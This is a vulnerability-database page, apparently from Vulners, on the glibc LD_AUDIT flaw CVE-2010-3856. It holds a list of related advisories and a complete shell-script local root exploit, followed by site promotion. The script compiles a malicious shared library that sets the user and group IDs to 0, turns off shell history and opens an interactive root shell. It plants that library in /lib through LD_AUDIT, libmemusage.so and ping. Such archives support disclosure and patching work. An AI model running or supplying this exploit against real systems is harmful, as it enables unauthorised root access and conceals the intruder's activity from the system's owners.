| Reporter | Title | Published | Views | Family All 113 |
|---|---|---|---|---|
| GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability | 23 Oct 201000:00 | – | zdt | |
| glibc LD_AUDIT arbitrary DSO load Privilege Escalation | 9 Nov 201100:00 | – | zdt | |
| Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root Exploit | 19 May 201300:00 | – | zdt | |
| glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation Exploit | 10 Feb 201800:00 | – | zdt | |
| glibc LD_AUDIT libmemusage.so RHEL-Based Arbitrary DSO Load Privilege Escalation Exploit | 1 Apr 201800:00 | – | zdt | |
| CentOS 5 : glibc (CESA-2010:0793) | 24 Nov 201000:00 | – | nessus | |
| Debian DSA-2122-1 : glibc - missing input sanitization | 24 Oct 201000:00 | – | nessus | |
| Fedora 12 : glibc-2.11.2-3 (2010-16641) | 1 Nov 201000:00 | – | nessus | |
| Fedora 13 : glibc-2.12.1-4 (2010-16655) | 29 Oct 201000:00 | – | nessus | |
| Fedora 14 : glibc-2.12.90-18 (2010-16851) | 29 Oct 201000:00 | – | nessus |
`#!/bin/sh
#
# [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit
#
# Edited by Todor Donev (todor dot donev at gmail dot com)
# This is another exploit for CVE-2010-3856
#
# Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov
# and Tsvetelina Emirska
#
# Another exploits:
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
# http://www.exploit-db.com/exploits/18105/
# http://seclists.org/fulldisclosure/2010/Oct/257
# http://seclists.org/bugtraq/2010/Oct/200
#
echo "[+] Setting umask to 0 so we have world writable files."
umask 0
echo "[+] Preparing binary payload.."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
unlink("/lib/sploit.so");
setuid(0);
setgid(0);
setenv("HISTFILE", "/dev/null", 1);
execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null
echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/sploit.so
rm /tmp/payload.c /tmp/exploit
echo "[+] Executing payload.."
LD_AUDIT="sploit.so" ping
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation